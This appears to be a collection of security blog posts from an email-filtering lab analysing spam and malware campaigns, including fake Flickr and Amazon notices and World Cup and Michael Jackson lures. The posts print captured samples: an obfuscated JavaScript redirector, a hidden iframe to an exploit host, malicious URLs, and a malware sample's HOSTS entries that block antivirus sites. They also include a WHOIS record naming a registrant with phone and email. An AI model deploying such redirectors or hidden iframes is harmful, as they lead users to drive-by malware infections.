MX Lab started to intercept messages with the subject “[Flickr] Welcome!”, send from a spoofed email address, with an welcome message  from Flickr (see image below).

Every link in the message leads to a different URL, even the links behind Terms of Services or the Privacy Policy.

hxxp://mahimatex.com/sanitation.html
hxxp://electricbrochures.com/custodian.html
hxxp://eventosgs.com.ar/climate.html
hxxp://newcivas.altervista.org/overstatements.html
hxxp://complicat.go.ro/modestly.html
hxxp://kankash-g-s.com/chicagoans.html
hxxp://pliki.open-it.pl/deigned.html
hxxp://turismatica.go.ro/grapefruit.html
hxxp://behsood.ir/schedulable.html
hxxp://jpaquino.com/headlines.html
hxxp://awtchiro.com/consulates.html

The web sites above function as a redirect to hxxp://keptoften.com/

Each message has different URLs included so these spammers are using a massive amount of domains in this campaign.

I personally do not understand why they are doing this because an Intent Analysis filter, that analyses the included URLs in emails, can blacklist many URLs from these web sites immediatly when investigating one single spam message.

When only using the domain for visiting the sites we get quite often a warning from our browser that the site is known to host malware. In other cases, or when ignoring the warning, we are redirected to hxxp://bestadultsite.ru/run/go.php?sid=3 and afterwards to the web site of Canadian Neighbor Pharmacy hxxp://pharmacymentalhealth.com (see image below).

MX lab intercepted some emails with the subject “Coupe du Monde de la FIFA 2010″ from World Cup <207peugeot@menara.ma> that are obviously spam and here is the body of the email:

bonjour ,

est ce que vous voulez voir les matchs de la coupe gratuitement ?
si oui n’hesiter pas a telecharger ce logiciel :

http://bit.ly/worldcupe

cordialement

=========================================

The message is in the French language but translated it offers you an option to get software to watch the soccer matches of the World Cup for free.

When using the bit.ly URL shortened link we arrive on the FLV web site http://www.flvpro.com/movies/?aff=4749_movies.

While this is all great, a free download of such a tool, getting your message in this format out to the world is not the way to do it. I refer to the use of bit.ly for the URL, no unsubscribe options and no clear indication who has sent this message. Very bad marketing if you ask me.

MX Lab reprted this to bit.ly, which is something we usually do not do but we thought why not, and bit.ly responded within 10 mintes with a reply that the shortened URL is blocked for further use. Thumbs up for such a fast response.

Now, this is completely off topic, but notice the counter ‘Downloaded 2358755 times’ on the web site http://www.flvpro.com/. This is just a Javascript ticker that increases the counter.

<script type="text/javascript">
var num = 2358754;
function IncCounter() {
num = num + 1;   // increment counter by 2
document.getElementById("cntr").innerHTML = num.toLocaleString();
t = setTimeout('IncCounter()', 2000);
// change 1000 to 60000 to update once per minute
}
</script>

When you refresh the page, the counter is back to 2358755.
Very nice marketing!

The from address is spoofed and this is the body of the email:

Hello!!

FIFA World Cup 2010 scandal news, read attached document

Attached is the file news.html or open.html that contains a malicious javascript:

<script type=’text/javascript’>

function dX(){};

var h=new Date();

dX.prototype = {

f : function() {

var u=function(){};

var uY=new Date();

var o=”";

var k=document;

var oE=function(){};

var l=”;

this.i=33457;

var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, ”)];

var w=function(){};

var p=false;

this.pP=false;

this.s=”;

kV['hGrGe>f>'.replace(/[\>mYGw]/g, ”)]=’hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/
2xJnSuJ4JeSjS/2z2.ShltlmJ’.replace(/[JS2\>l]/g, ”);

var iK=”iK”;

pK=”;

this.d=”d”;

uM=”";

}

};

this.dK=”";

var fG=new dX();

var dR=”dR”;

fG.f();

hJ=false;

</script>

This Javascript will redirect your browser to hxxp://advancedwoodtech.com/xnu4ej/z.htm.

At the moment, the web site page mentioned here is not active, we got a 404 error when visiting, so we can’t investigate this further. But we are pretty sure that you will download some malware with an attempt to infect your computer and get redirected to a spam web site of the Canadian Pharmacy.

This email has all the characteristics of previous campaigns where social media is being used to lure visitors to a web site and get their computer infected.

Our recommendation is: when you receive this type of email, do not open the attached HTML file and delete the email.

[UPDATE]

MX Lab intercepted a new version of this social engineering attack and the email now contains the file open.html.

This leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The online document z.html contains the following code:

<meta http-equiv="refresh" content="3;url=hxxp://toldspeak.com/" />

<iframe src='hxxp://hugefrogs.ru:8080/index.php?pid=10' width='1'
height='1' style='visibility: hidden;'></iframe>

This will redirect your browser to hxxp://toldspeak.com after 3 seconds that contains the Canadian Pharmacy web site as mentioned earlier.

The site hxxp://hugefrogs.ru:8080/index.php?pid=10 contains more obfuscated JavaScript that creates an iframe to a PDF file and to a Java .jar file. With one of these files an attack is being executed to the computer.

The email offers a software tool called Explorer Spam Detector from Symantec:

Systematic launched a new program SPAM detector Explorer, the program automatically detects if a page is original or not, if you open a mail if the sender is not original is detected. If you are tired of spammers and you are tired as your accounts will be broken, to lose money on paypal or lose auctions, Download this program and all your data, all your accounts will be safe. This program is free, you do not need to buy it, you do not need a license.

Below is an actual screenshot of the email:

The included URLs wil take you to a web site where the malware is hosted: hxxp://systematic.armed.us/download/Setup.exe.

The malware is approx. 1,5 MB when downloaded and is named Setup.exe.

Submission to Virus Total gives us the result that only 1 of the 40 AV engines did detect the malware: Symantec AV engine version 20091.2.0.41. The name Suspicious.Insight is a detection for files from the Symantec’s reputation-based security technology so this is not the name of the malware.

When executed on a computer, the system gets infected and a new window is created:

With the appearance of this window on your system you could have the indication that the software didn’t installed correctly. By now, your computer is infected.

Folowing files are created:

%AppData%\Microsoft\System\Services\[filename of the sample #1] where %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The file %System%\drivers\etc\hosts is modifed and following folders are created:

* %AppData%\Microsoft\System
* %AppData%\Microsoft\System\Services

A Windows registtry is added so that the malware is run each time the computer boots:

# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
* [filename of the sample #1] = “%AppData%\Microsoft\System\Services\[filename of the sample #1]“

The HOSTS file is updated with the following URL-to-IP mappings:

127.0.0.1 www.virscan.org
127.0.0.1 virscan.org
127.0.0.1 221.207.255.61
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 74.53.201.162
127.0.0.1 scanner.novirusthanks.org
127.0.0.1 91.121.223.25
127.0.0.1 www.xxbots.net
127.0.0.1 xxbots.net
127.0.0.1 208.43.26.70
127.0.0.1 www.virusscan.jotti.org
127.0.0.1 virusscan.jotti.org
127.0.0.1 66.36.241.92
127.0.0.1 forums.malwarebytes.org
127.0.0.1 74.63.217.106
127.0.0.1 www.codespace.net
127.0.0.1 codespace.net
127.0.0.1 174.133.4.108

As you can see, with this action you will not longer have access to the web sites that are listed here. Due to the HOSTS file change, all request to visit these sites will point you back to your local computer on 127.0.0.1. This is in order to avoid that the user can visit these sites for information or for downloading anti virus/malware software. If you are infected with this malware, make sure that you modify the HOSTS file.

The possible country of origin for this malware is Russia.

Virus Total permlink and MD5: 97ff431ca077c59d76d147832260b7ef.

MX Lab noticed an increase the last few days of URLs in spam messages that point to (free) web site creater hosts or less well know blog creators. Some of the latest victims are doodlekit.com, sitekreator.com, webs.com, webstarts.com and blogdrive.com.

Some examples of the spam:

of necromancer beyond power drill ostensibly wily
dissidents customer
PornstarMikaTanAnalFingering hxxp://trhombic.blogdrive.com
because girls

dissidents blotched greedily

mirror about starlet likeable
WorldOfLustyAmatteurGalsFujckkingOnCameraWithBigCodfckedLadsAndBelovedSelxToys hxxp://sitekreator.com/Dewtty/sdfgty.html

haunchestoward

for cleavage inside carelessly womanly
bubble baths scythe
AsianSuckingAndFuckingHardcore hxxp://wilfredorz.webs.com
or tea parties

over and accidentally

tea parties flabby
WorldOfLustyAmatenurGalsFujckkingOnCameraWithBigCobckedLadsAndBelovedSjexToys hxxp://s2.webstarts.com/ssey/q2.html

philosopherssecretly

What we also notice is the use of random words in the spam message again. This is a very common technique being used in the past to avoid detected by Bayesian filters and/or to compromise and corrupt the knowledge database of the Bayesian filter when the message is used to train the filter.

This technique is also present in the latest spam campaign of the Canadian Pharmacy:

This is a link to our shop http://bc.greatsilent.ru/

gazoive dyojefip eicyla uxamo kajoubemi zitykiboto yejy
irewyumuco izaafoe samin uypoi nyqii asydado
hoxyaogeqa eokinap asiwy yziuboaxoj alomem kawuqyxy
ajitikumoa fiaxe oqoce qiahow yvenouwa bosyebuje ucotaley
yeqa uhybyo nidodyziru logu noboma uuju uedywaby
…. (cut)….

New web site creator hosts are being used each day. When I visited a few of those web site creator host I found out that subscription is so easy to do. You can automate account requests quite easily up to a certain point without being blocked by some way of security measure or by clicking on an activation link by email.

On doodlekit.com we found a CAPTCHA security on the subscription web form but I believe that a good CAPTCHA should have letters that are less readable than this one. But, this is a start.

On webs.com I did set up a dummy web site account with the site address http://tryviagra.webs.com without any security measure! This means that anyone can set up an free web site creator account when completing the webforms.

In this particular case, I can even automate every step and let a bot do all the work for you. I could create from 10 to 100 accounts on a day and perhaps the site administrators wouldn’t even notice this. It is a very efficient way of getting coverage on the internet, getting free hosting for my site or redirect visitors to my site.

To make it worse, I can also place malware on this site and try to infect each visitor on my site with malware, ransomware or other malicious files.

As a spammer, I have the advantage over Intent Anyalisis tools or SURBL, tools that examine and block messages based on the included URLs, by generating mutliple URLs each day and changing URLs in the spam message.

Again, it shows that internet security is a responsability of everyone and everyone should get involved. If we want to stop spammers, we also have to make sure that some of the features that spammers have today – this is a nice example I think – can’t be used tomorrow.

Feel free to comment on this post.

Disclaimer: it is not our intention to attack webs.com on their lack of security – perhaps in a certain way it is – but to point out how easy it is to abuse certain online tools.

The campaign comes from the spoofed email address Customer Support <***.***@service.amazon.com> and has the possible following subjects (*** numbers will vary):

Confirm #***
Confirmation Order #***
Notice #***
Notify #***
Notification #***
Order Confirmation #***
Order Notice #***
Order Notify #***
Order Notification #***

The body of the email:

Your Order S\n:10444064511 Accepted.
Details hxxp://www.klaudiusz.ramtel.pl/afrikaners.html

Thank you.
Amazon.com Customer Support

The campaign is detected yesterday but today we found a few threaths when following the included URLs. One threat was named HTML:iFrame-LZ[Trj] (Avast).

HTML:iFrame-LZ[Trj] is a malicious HTML script that may be downloaded unknowingly by a user when visiting malicious Web sites. The script will make connection to sites to download file(s). As a result, malicious routines of the downloaded files are exhibited on the affected system.

The campaign is sent from random spoofed email addresses and has similar subjects like:

7U1 An amazing selection of brand name medications, all for incredibly low prices!
2F9 Looking for Hytrin? 7N8
6W3 Looking for Abilify?
5Z2 Looking for Fosamax?
4G5 Do you suffer from male impotence? Order Viagra online today 8I7
5Y5 Do you have a urinary blockage?

Some samples of the body:

hxxp://twitter.com/oscaresquire/status/5804523982

All Medications are Always 100% Safe Legal
Our store is Verified, Trusted Licensed
Guaranteed LowPrices – up to 85% Off

! G6Y3

* P h 3nt_ er mI.ne 37.5
* S0 .m@
* X@ /\/ a .X
* R1 .T@ L in
* C 0 d1n3
* V /\ L 1Um
* KL 0 N_0.p in
* AMB1en
* Ci..@ _Lis
* V| @ g.R @

www.twitter.com/dweepadvani/status/5790731913
This message was sent to 96190

And another one

site that pharmacies and big companies don’t want you to know about!
Vicodin ES Online, Hyrdrocodone, Lortab…

hxxp://twitter.com/itaiba/status/5803131461

They all have the URL in common that points to a Twitter account. The format is  http://twitter.com/***/status/*** where *** stands for random characters.

Some examples of such an Twitter account that directs you to the online pharmacy.

The med4udirect.com shop looks like this:

The domain appears to registered in China.

 DomainName : MEDS4UDIRECT.COM

RSP: China Springboard Inc.
URL: http://www.namerich.cn      

Name Server :NS3.BERTOSNS.COM
Name Server :NS5.LOVELYSNB34.COM
Name Server :NS1.HDNSSTUFF.COM
Name Server :NS6.LOVELYSNB34.COM
Name Server :NS2.HDNSSTUFF.COM
Name Server :NS4.BERTOSNS.COM
Status :clientTransferProhibited
Status :clientDeleteProhibited
Creation  Date :2009-09-26
Expiration Date :2010-09-26
Last Update  Date :2009-11-11

Registrant ID :V-X-63521-21717
Registrant Name :LU TAO
Registrant Organization :LU TAO
Registrant Address :JIEFANGLU251
Registrant City :ShangHai
Registrant Province/State :ShangHai
Registrant Country Code :CN
Registrant Postal Code :200126
Registrant Phone Number :+86.0217415426
Registrant Fax :+86.0217415426
Registrant Email :djsnhe@163.com

Administrative ID :V-X-63521-21717
Administrative Name :LU TAO
Administrative Organization :LU TAO
Administrative Address :JIEFANGLU251
Administrative City :ShangHai
Administrative Province/State :ShangHai
Administrative Country Code :CN
Administrative Postal Code :200126
Administrative Phone Number :+86.0217415426
Administrative Fax :+86.0217415426
Administrative Email :djsnhe@163.com

Billing ID :V-X-63521-21717
Billing Name :LU TAO
Billing Organization :LU TAO
Billing Address :JIEFANGLU251
Billing City :ShangHai
Billing Province/State :ShangHai
Billing Country Code :CN
Billing Postal Code :200126
Billing Phone Number :+86.0217415426
Billing Fax :+86.0217415426
Billing Email :djsnhe@163.com

Technical ID :V-X-63521-21717
Technical Name :LU TAO
Technical Organization :LU TAO
Technical Address :JIEFANGLU251
Technical City :ShangHai
Technical Province/State :ShangHai
Technical Country Code :CN
Technical Postal Code :200126
Technical Phone Number :+86.0217415426
Technical Fax :+86.0217415426
Technical Email :djsnhe@163.com

It’s not image based, no ASCII art but the text is constructed and formatted by the character “#”. It didn’t render well in Entourage on Mac so it needs a little work.

Canadian Pharmacy spam

One of the campaigns contains the subject “Michael Jackson dead? NO!!!” and the body content:

Michael Jackson dead? NO!!!
Open attached file and read!!!

The attachment itself appears to be harmless and contains the HTML refresh tag

<meta http-equiv=’Refresh’ content=’0; url=hxxp://addfamous.com/’ />

This will redirect your browser to the Canadian Pharmacy web site.

Email harvesting

Another campaign has the intention to harvest email addresses and is coming from a bogus email account but the reply to is a ***@live.com account. The email claims to have special and confidential information regarding the death of Michael Jackson. A sample of the content:

Confidential
Vital informations after the death of Michael Jackson’s I really need some one trusted & secretive to speak with with informations i have in my possession before its too late Kindly reply me and i will immediately respond back,Its for just secret between both of us

The call-to-action is to reply to this message. When doing so you will confirm the spammer that the email has been received and read and therefore is active.

Malicious spam

This spam email offers a link to a YouTube video but actually sends the recipient to a Trojan Downloader hosted on a compromised web site. The file is Michael.Jackson.videos.scr. When downloaded and executed 3 information-stealing components are downloaded and installed by the malware. One of the files has the name michael.gif and has a very low AV detection rate.

The malware then installs a malicious BHO that is registered with this file %windir%\Dynamic.dll. Another component is bound to startup at %windir%\system32\kproces.exe. Another malicious file installed by the malware is %windir%\system32\fotos.exe.

Upon executing the file, a legitimate Web site at http://musica.uol.com.br/ultnot/2009/06/25/michael-jackson.jhtm is opened by the default browser in order to distract the user by presenting a news article for them to read.

Virus Total permlink and MD5: 664cb28ef710e35dc5b7539eb633abca.

Student Loans

A spam with the subject and the body content “Micheal Jackson History”, notice the wrong spelling of his firstname, leads to hxxp://loansofworld.blogspot.com/. This message was sent through Google Groups.

Contact databases

An email with the subject “Michael Jackson: last farewell from DataForYou” is attracting readers with a subject related to Michael Jackson but instead offers contact databases.

Notice the TinyURL inside the email content to hide a direct link to the web site. TinyURL has already removed the URL but  this example shows that you need to be carefull with URLs in emails where a service like TinyURL is shortening the full URL. Try to use a preview feature first when you don’t trust the source is our recommendation.

Dear Sirs,
in our site you have access, through the cheapest prices you have ever seen,
to a vast database of international Companies, divided by region, province, city or area of activity.

The databases are divided into two broad categories.

Archives of International Companies with E-mai only

The archives are divided by country and include a list of e-mail only.
The archives are in TXT format and they are easy to be used because
this format is the typical one used for data import. You can also find
more than one email, relferring to different people working in the same
structure, for the Companies which have provided them.

International Archives of active domains with MX record only

The archives are divided by size and include a list of domains only.
The archives are in TXT format and they are easy to use because this
format is the typical one used for data iimport. All the domains have
an active MX record; this means that each domain is directly linked
with working email accounts.

Visit our site at
hxxp://tinyurl.com/infinitemail

Don’t lose this incredible opportunity for increment your business.

InfiniteMail

Customer Care

If you no longer want to receive our email reply here:
mailto:remove@mediasch0pping.com

National Survey Panel’s Gift Program

What killed Michael Jackson?

Press here:
hxxp://totjebiok.com/tr.php?72928+*****@*****.com

Tell us. Then complete the program requirements for a FREE 7 album collection of MJ’s solo career.

These guys are using the death of Michael Jackson to attract some people to fill in some information and in return you can receive his albums for free.

MX Lab intercepted spam messages with a Health.com branding. The image below shows us a mailing template with the Health logo, an image for viagra and other pills, along withlinks to Twitter, Facebook and YouTube, opt-out links, privacy policy and the address of Health.com.

Spammer have replaced each of the links with hxxp://www.blackaringo.ru in this campaign that redirects to hxxp://newpharmshappy.com/. This site is from our best friends, who else, the Canadian Pharmacy.